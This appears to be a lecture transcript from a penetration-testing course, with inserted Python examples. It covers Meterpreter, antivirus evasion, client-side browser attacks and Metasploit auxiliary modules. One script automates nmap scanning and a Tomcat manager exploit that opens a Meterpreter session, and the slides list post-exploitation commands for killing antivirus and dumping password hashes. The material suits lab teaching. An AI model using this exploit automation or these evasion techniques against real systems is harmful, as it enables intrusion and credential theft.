MIS 5212.001 Week 2 Site:

Presentation transcript:

 Introduction
 In the news
 Meterpreter
 Avoiding Detection
 Client Side Attacks
 Auxiliary Modules
 Next Week

 Submitted
 surge-in-2014-mobile-malware-onslaught/d/d-id/
 data-breaches-in-first-half-2014-were-preventable/
 gle-discloses-windows-bugs.aspx
 and-turn-break-browser-privacy-protections

 Submitted
 t-card-hacks-target_n_html?utm_hp_ref=hackers
 content/us/pdfs/security-intelligence/reports/rpt-the-invisible-becomes-visible.pdf

 What I noted

 Meterpreter is an extension to the Metasploit Framework that leverages Metasploit functionality to extend what can be done on a victim system once it has been exploited.
 Meterpreter provides the facility to migrate to a different process once a system has been compromised.

 Most examples for Meterpreter are shown on Windows. This is because Windows is easier for Meterpreter to deal with.
 The goal of Meterpreter is to remain entirely in memory, that is, no footprint on the hard drive, to make detection more difficult.
 Windows facilitates this through built-in APIs (in-memory library loading and process injection) that have no direct equivalent in Linux.
 We will work through a Linux example due to licensing and the availability of Metasploitable.

 After getting the database to work last week, it failed again during testing for this week.
 Eventually Kirk built a new version of Metasploit framework and nmap in a fresh version of Ubuntu.
 URL for directions: metasploit-in-ubunt/
 This will work, but the step "bundle install" will require sudo, and running nmap or Metasploit-framework will also require sudo.

 We will use nmap, Metasploit framework, and Metasploitable.
 We will launch both Kali and Metasploitable.
 In this example:
 Metasploit =
 Metasploitable =

 Basic scan with nmap
 Looking through the scan we see

 Looking through the scan we also see

 Now, start building the exploit

 We can see Tomcat is up and running!
 Googling shows the default ID/password is tomcat/tomcat.

 Now, start building the exploit

 Information I found on forums suggested the payload "java/meterpreter/reverse_tcp" should work. Tried numerous times without success.
 Decided to "play around". Tried the PAYLOAD "bind_tcp".
 Results on next pages

 I'm in!

 Grab some info:
 And now we can background the process and do it again
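The scan-then-exploit sequence above, as an added example rather than anything from the slides: a small Python script that parses an nmap XML scan, picks out the Tomcat service, and writes a msfconsole resource script that first confirms the default manager credentials with an auxiliary scanner module and then runs the manager upload exploit with the java/meterpreter/bind_tcp payload the slides ended up using. The 10.0.0.20 address and the nmap XML sample are constructed; the module and option names are those of a 2015-or-later framework (older trees used exploit/multi/http/tomcat_mgr_deploy with USERNAME/PASSWORD), so confirm them with `show options` on your own install.

```python
"""Added example, not from the original slides: parse an nmap scan, spot the
Tomcat service, and emit a Metasploit resource script that verifies the
default manager credentials (auxiliary module) and then runs the manager
upload exploit with the java/meterpreter/bind_tcp payload.

Assumptions (not on the page): the host address and the nmap XML sample are
constructed; module/option names are those of a 2015+ framework (older trees
use exploit/multi/http/tomcat_mgr_deploy with USERNAME/PASSWORD); check with
`show options` on your install.
"""
import subprocess
import sys
import xml.etree.ElementTree as ET

# Constructed `nmap -sV -oX -` output, trimmed to the elements the parser reads.
# Metasploitable 2 runs Tomcat on 8180, not the usual 8080.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="10.0.0.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="8180"><state state="open"/>
        <service name="http" product="Apache Tomcat/Coyote JSP engine"/></port>
    </ports>
  </host>
</nmaprun>
"""


def find_tomcat(xml_text):
    """Return (ipv4, port) pairs for open ports nmap fingerprinted as Apache Tomcat."""
    hits = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            if state is None or state.get("state") != "open" or svc is None:
                continue
            if "tomcat" in (svc.get("product") or "").lower():
                hits.append((addr.get("addr"), int(port.get("portid"))))
    return hits


def build_rc(rhost, rport, username="tomcat", password="tomcat", lport=4444):
    """Render an msfconsole resource script (the commands typed by hand in the slides)."""
    lines = [
        # Auxiliary (scanner) module: confirm the default manager credentials first.
        "use auxiliary/scanner/http/tomcat_mgr_login",
        f"set RHOSTS {rhost}",
        f"set RPORT {rport}",
        f"set USERNAME {username}",
        f"set PASSWORD {password}",
        "set STOP_ON_SUCCESS true",
        "run",
        # Exploit: upload a WAR through the manager and get a Java Meterpreter.
        "use exploit/multi/http/tomcat_mgr_upload",
        f"set RHOSTS {rhost}",
        f"set RPORT {rport}",
        f"set HttpUsername {username}",
        f"set HttpPassword {password}",
        # bind_tcp: the target listens on LPORT and we connect in, so the session
        # does not depend on the target being able to reach our LHOST.
        "set PAYLOAD java/meterpreter/bind_tcp",
        f"set LPORT {lport}",
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


def main(target):
    """Scan, then hand each Tomcat instance to msfconsole (sudo, per the slides' Ubuntu build)."""
    scan = subprocess.run(["nmap", "-sV", "-oX", "-", target],
                          check=True, capture_output=True, text=True).stdout
    for host, port in find_tomcat(scan):
        rc_path = f"tomcat_{host}_{port}.rc"
        with open(rc_path, "w") as fh:
            fh.write(build_rc(host, port))
        subprocess.run(["sudo", "msfconsole", "-q", "-r", rc_path])


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "10.0.0.20")  # constructed default target
```

Run it as `python3 tomcat_rc.py <metasploitable-ip>`; the generated .rc file is plain text, so it can be reviewed (or edited to reverse_tcp with an LHOST) before msfconsole consumes it.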

 Allows the attacker to "pivot" through a compromised machine and either attack other processes on the host machine, or attack another machine on the victim network.

 Once you get to that meterpreter prompt
 More options open up

 Migrate to another process
 run post/windows/manage/migrate
 Kill antivirus software
 run killav
 Dump system password hashes
 run hashdump
 View all traffic
 run packetrecorder -i 1
 Note: not all actions work with all payloads. The four above are Windows Meterpreter scripts and post modules; the Java Meterpreter used against Metasploitable does not offer process migration or hashdump.

 You don't want to be caught by antivirus software.
 Most AV systems are signature based.
 A signature must be specific enough that it triggers only when it meets truly malicious software.
 Therefore, we can create unique payloads that the AV vendor has not yet seen and written a signature for. The catch is that the decoder stub an encoder prepends is itself constant and gets signatured in turn, so encoding buys less than it did when these slides were written.

 The Metasploit-framework came with two tools to help with this:
 Msfencode
 Msfpayload
 Both of these are now deprecated and will be removed on or about June of 2015.
 Msfvenom is the replacement.
 All three are currently part of the framework.

 Here's a snippet
 There are so many options that the output had to be piped to more to show the beginning of the list.

 What are our options?

 MSFconsole is still up in another terminal.
 Note that options I had selected in that session are still active in the payloads.

 Since venom is the future

 Example
 Result

 Packers
 Packers are tools that compress an executable and combine it with decompression code to expand it upon execution.
 The resultant code will not match the signature of the original.
 A popular packer is UPX.
 You can get it by running this
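To make the signature argument concrete, here is an added Python example (not from the slides, and not real shellcode or real AV rules): a toy byte-signature scanner, a single-byte XOR encoder in the spirit of msfencode/msfvenom (including the `-i N` multi-pass idea), and a compression "packer" in the spirit of UPX. PAYLOAD and SIGNATURES are constructed placeholders. The report at the end also shows the limit of the trick: once the decoder or unpacker stub has run, the original bytes are back in memory, which is exactly where an emulating or memory-scanning engine looks.

```python
"""Added example, not from the original slides: a toy signature scanner and two
payload transformations (XOR encoding as msfencode/msfvenom encoders do it,
compression packing as UPX does it) showing why a byte signature stops matching.

Everything here is constructed: PAYLOAD is a placeholder, not shellcode, and
SIGNATURES is not a real AV rule set.
"""
import os
import zlib

# Constructed stand-in for a generated payload, with a distinctive substring
# that a signature-based scanner keys on.
PAYLOAD = b"\x90" * 8 + b"PLACEHOLDER-SHELLCODE" + b"\xcc" * 4
SIGNATURES = {"placeholder-shellcode": b"PLACEHOLDER-SHELLCODE"}

PACK_MAGIC = b"PACKED\x00"   # marker a toy unpacking stub would look for


def scan(blob, signatures=SIGNATURES):
    """Naive signature engine: names of every signature whose bytes occur verbatim."""
    return sorted(name for name, pattern in signatures.items() if pattern in blob)


def xor_encode(data, key=None):
    """Single-byte XOR encoder: returns key || (data ^ key).

    This is the core of what an encoder does; a real one also prepends a
    decoder stub that performs xor_decode() at run time.
    """
    if key is None:
        key = os.urandom(1)[0] or 0x41   # key 0 would leave the bytes unchanged
    return bytes([key]) + bytes(b ^ key for b in data)


def xor_decode(blob):
    """What the decoder stub does before jumping to the real payload."""
    key, body = blob[0], blob[1:]
    return bytes(b ^ key for b in body)


def encode_iterations(data, iterations, key=0x41):
    """msfvenom -i N analogue: re-encode the previous pass with a fresh key.

    Per-pass keys are derived from `key` so the result is reproducible here;
    a real encoder would randomise them."""
    for n in range(iterations):
        pass_key = ((key * (n + 1)) & 0xFF) or 0x01   # never XOR with 0
        data = xor_encode(data, pass_key)
    return data


def decode_iterations(blob, iterations):
    for _ in range(iterations):
        blob = xor_decode(blob)
    return blob


def pack(data):
    """Packer reduced to its essence: compress and prefix a marker.  The original
    bytes only exist again after the unpacking stub decompresses them."""
    return PACK_MAGIC + zlib.compress(data, 9)


def unpack(blob):
    if not blob.startswith(PACK_MAGIC):
        raise ValueError("not a packed blob")
    return zlib.decompress(blob[len(PACK_MAGIC):])


def evasion_report(data=PAYLOAD, key=0x41):
    """Signature hits on the raw payload versus its transformed forms, and again
    after the stub has undone the transformation (what an emulating AV engine or
    a memory scan sees)."""
    encoded = encode_iterations(data, 5, key)
    packed = pack(data)
    return {
        "raw": scan(data),
        "xor_encoded": scan(encoded),
        "packed": scan(packed),
        "after_decode": scan(decode_iterations(encoded, 5)),
        "after_unpack": scan(unpack(packed)),
    }


if __name__ == "__main__":
    for stage, hits in evasion_report().items():
        print(f"{stage:>13}: {hits or 'no signature match'}")
```

The two "after_" entries are the practitioner's caveat: encoding and packing change what is on disk, not what executes, so they defeat static signatures only until the vendor signatures the stub or the engine emulates it.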

 We talked a bit about this last semester.
 These include:
 Browser based attacks
 PDF readers
 MS Office files
 Flash files
 Etc.
 We're just going to briefly talk about some browser attacks here.

 First a little background.
 In machine code there is something called a "no operation" (NOP): an instruction that does nothing, has no effect, and just takes up space.
 On x86 the single-byte NOP is opcode 0x90, written \x90 in a shellcode string.
 String a lot of them together and you build something called a NOP sled.
 Put a little shellcode at the end and you have an attack: execution can land anywhere in the sled and slide down into the shellcode, so the attacker does not need to hit one exact address.

 Browsers allocate the data a page creates (strings, arrays, objects) on a "heap".
 Maybe you have heard the phrase "heap spray" or "heap spraying".
 This refers to allocating many copies of attacker-controlled data so that a large, predictable range of heap addresses is filled with it; a corrupted pointer that is then redirected into that range lands on the attacker's bytes.
 Combine this with the NOP sled and you have a mechanism to inject code via a browser.

 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90[Shellcode Here]

 Msfpayload, msfencode, and msfvenom have the ability to combine a NOP sled with shellcode in a payload that can be attached to a link for a browser, or placed in a PDF or other document.
 That is as far as we are going with this. Just know that the tools have this capability.
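The sled-plus-spray mechanism above, as an added toy model in Python (not from the slides, and not an exploit): memory is a bytearray, the "shellcode" is a constructed marker string, and "execution" is a loop that steps over 0x90 bytes. It shows what the sled buys you: on a sprayed heap almost any landing address reaches the shellcode, whereas a single copy with no sled must be hit to the byte.

```python
"""Added example, not from the original slides: a toy model of the NOP sled and
heap spray.  'Memory' is a bytearray, 'shellcode' is a placeholder marker, and
'execution' is a loop that steps over 0x90 bytes; no native code runs.
"""
import random

NOP = 0x90                                              # x86 single-byte NOP
SHELLCODE = b"\xcc" * 4 + b"SHELLCODE-PLACEHOLDER"      # constructed marker, not real shellcode


def build_block(block_size, shellcode=SHELLCODE):
    """One spray block: a NOP sled padded so the shellcode sits at the very end."""
    if len(shellcode) >= block_size:
        raise ValueError("block too small for the shellcode")
    return bytes([NOP]) * (block_size - len(shellcode)) + shellcode


def spray(heap_size, block_size, shellcode=SHELLCODE):
    """Fill a simulated heap with back-to-back copies of the block (what the
    JavaScript in a browser exploit does with many large strings)."""
    block = build_block(block_size, shellcode)
    heap = bytearray(heap_size)                         # unsprayed bytes stay 0x00
    for offset in range(0, heap_size - block_size + 1, block_size):
        heap[offset:offset + block_size] = block
    return heap


def execute_from(heap, address, shellcode=SHELLCODE):
    """Model the CPU being redirected to `address`: slide over NOPs, then report
    whether we arrived exactly at the start of an intact shellcode copy
    (landing in the middle of the shellcode would crash, so that counts as a miss)."""
    pc = address
    while pc < len(heap) and heap[pc] == NOP:
        pc += 1
    return heap[pc:pc + len(shellcode)] == shellcode


def landing_rate(heap, trials=5000, seed=7, shellcode=SHELLCODE):
    """Fraction of random landing addresses that reach the shellcode."""
    rng = random.Random(seed)
    hits = sum(execute_from(heap, rng.randrange(len(heap)), shellcode)
               for _ in range(trials))
    return hits / trials


def sled_fraction(block_size, shellcode=SHELLCODE):
    """Expected landing rate on a fully sprayed heap: the share of each block that
    is sled, plus the first shellcode byte."""
    return (block_size - len(shellcode) + 1) / block_size


if __name__ == "__main__":
    sprayed = spray(heap_size=64 * 1024, block_size=1024)
    print("sprayed heap, landing rate:", landing_rate(sprayed))
    print("expected from sled size   :", sled_fraction(1024))
    bare = bytearray(64 * 1024)                          # one copy, no sled
    bare[4096:4096 + len(SHELLCODE)] = SHELLCODE
    print("single copy, no sled      :", landing_rate(bare))
```

Shrinking the shellcode or growing the block raises sled_fraction, which is why real sprays use blocks of tens of kilobytes with a few hundred bytes of shellcode at the end.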

 Metasploit-Framework auxiliary modules are modules that perform functions other than exploitation.
 Broken down into three main areas:
 Admin
 Scanner
 Server

 Auxiliary Admin modules break down into these areas:
 Admin HTTP modules (tomcat)
 Admin MSSQL modules
 Admin MySQL modules
 Admin Postgres modules
 Admin VMWare modules

 Auxiliary Scanner modules break down into these areas:
 DCERPC
 Discovery
 FTP
 HTTP
 IMAP
 MSSQL
 MySQL
 NetBIOS
 POP3
 SMB
 SMTP
 SNMP
 SSH
 Telnet
 TFTP
 VMWare
 VNC

 Auxiliary Server modules break down into these areas:
 ftp
 http_ntlm
 imap
 pop3
 smb

 Social Engineering Toolkit
 SQL Injection
 Karmetasploit
 Building Modules in Metasploit
 Creating Exploits

 Questions?